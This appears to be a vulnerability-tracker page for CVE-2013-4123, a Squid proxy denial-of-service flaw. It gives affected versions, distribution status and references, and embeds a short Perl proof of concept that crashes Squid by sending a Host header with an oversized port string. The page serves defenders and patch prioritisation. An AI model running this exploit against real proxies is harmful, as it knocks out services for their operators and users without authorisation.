CVE-2013-4123
medium
CVSS v3
โ
CVSS v4 NEW
โ
VIR risk
6.0
Description
client_side_request.cc in Squid 3.2.x before 3.2.13 and 3.3.x before 3.3.8 allows remote attackers to cause a denial of service via a crafted port number in a HTTP Host header.
Predictions
Exploit likelihood
20%
Patch ETA
โ
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Squid 3.3.5 - Denial of Service (PoC)
#Squid Crash PoC
#Copyright (C) Kingcope 2013
#tested against squid-3.3.5
#this seems to be the patch for the vulnerability:
#http://www.squid-cache.org/Versions/v3/3.3/squid-3.3.8.patch
#The squid-cache service will respawn, looks like a kind of assert exception:
#2013/07/15 20:48:36 kid1| Closing HTTP port 0.0.0.0:3128
#2013/07/15 20:48:36 kid1| storeDirWriteCleanLogs: Starting...
#2013/07/15 20:48:36 kid1| Finished. Wrote 0 entries.
#2013/07/15 20:48:36 kid1| Took 0.00 seconds ( 0.00 entries/sec).
#FATAL: Bungled (null) line 9: snmp_access deny all
#Squid Cache (Version 3.2.11): Terminated abnormally.
#CPU Usage: 0.020 seconds = 0.012 user + 0.008 sys
#Maximum Resident Size: 33312 KB
#Page faults with physical i/o: 0
#Memory usage for squid via mallinfo():
# total space in arena: 4100 KB
# Ordinary blocks: 4046 KB 7 blks
# Small blocks: 0 KB 0 blks
# Holding blocks: 564 KB 2 blks
# Free Small blocks: 0 KB
# Free Ordinary blocks: 53 KB
# Total in use: 4610 KB 112%
# Total free: 53 KB 1%
#2013/07/15 20:48:39 kid1| Starting Squid Cache version 3.2.11 for
i686-pc-linux-gnu...
#2013/07/15 20:48:39 kid1| Process ID 2990
use IO::Socket;
my $sock = IO::Socket::INET->new(PeerAddr => '192.168.27.146',
PeerPort => '3128',
Proto => 'tcp');
$a = "yc" x 2000;
print $sock "HEAD http://yahoo.com/ HTTP/1.1\r\nHost: yahoo.com:$a\r\n\r\n";
while(<$sock>) {
print;
}
OS impact
SUSE Affected 1 release
| Version | Status | Fixed in |
|---|---|---|
| 12.3 | Affected | โ |
Debian Fixed 5 releases
| Version | Status | Fixed in |
|---|---|---|
| trixie | Fixed | 0 |
| sid | Fixed | 0 |
| forky | Fixed | 0 |
| bullseye | Fixed | 0 |
| bookworm | Fixed | 0 |
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| squid-cache | squid | 3.3.0 | |
| squid-cache | squid | 3.3.0.2 | |
| squid-cache | squid | 3.3.0.3 | |
| squid-cache | squid | 3.3.1 | |
| squid-cache | squid | 3.3.2 | |
| squid-cache | squid | 3.3.3 | |
| squid-cache | squid | 3.3.4 | |
| squid-cache | squid | 3.3.5 | |
| squid-cache | squid | 3.3.6 | |
| squid-cache | squid | 3.3.7 | |
| squid-cache | squid | 3.2.0.1 | |
| squid-cache | squid | 3.2.0.2 | |
| squid-cache | squid | 3.2.0.3 | |
| squid-cache | squid | 3.2.0.4 | |
| squid-cache | squid | 3.2.0.5 | |
| squid-cache | squid | 3.2.0.6 | |
| squid-cache | squid | 3.2.0.7 | |
| squid-cache | squid | 3.2.0.8 | |
| squid-cache | squid | 3.2.0.9 | |
| squid-cache | squid | 3.2.0.10 | |
| squid-cache | squid | 3.2.0.11 | |
| squid-cache | squid | 3.2.0.12 | |
| squid-cache | squid | 3.2.0.13 | |
| squid-cache | squid | 3.2.0.14 | |
| squid-cache | squid | 3.2.0.15 | |
| squid-cache | squid | 3.2.0.16 | |
| squid-cache | squid | 3.2.0.17 | |
| squid-cache | squid | 3.2.0.18 | |
| squid-cache | squid | 3.2.0.19 | |
| squid-cache | squid | 3.2.1 | |
| squid-cache | squid | 3.2.2 | |
| squid-cache | squid | 3.2.3 | |
| squid-cache | squid | 3.2.4 | |
| squid-cache | squid | 3.2.5 | |
| squid-cache | squid | 3.2.6 | |
| squid-cache | squid | 3.2.7 | |
| squid-cache | squid | 3.2.8 | |
| squid-cache | squid | 3.2.9 | |
| squid-cache | squid | 3.2.10 | |
| squid-cache | squid | 3.2.11 | |
| squid-cache | squid | 3.2.12 | |
References
- http://lists.opensuse.org/opensuse-updates/2013-09/msg00024.html
- http://secunia.com/advisories/54142
- http://secunia.com/advisories/54834
- http://www.squid-cache.org/Advisories/SQUID-2013_3.txt
- http://www.squid-cache.org/Versions/v3/3.2/changesets/squid-3.2-11826.patch
- http://www.squid-cache.org/Versions/v3/3.3/changesets/squid-3.3-12591.patch
- https://security-tracker.debian.org/tracker/CVE-2013-4123
CWEs
CWE-20
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.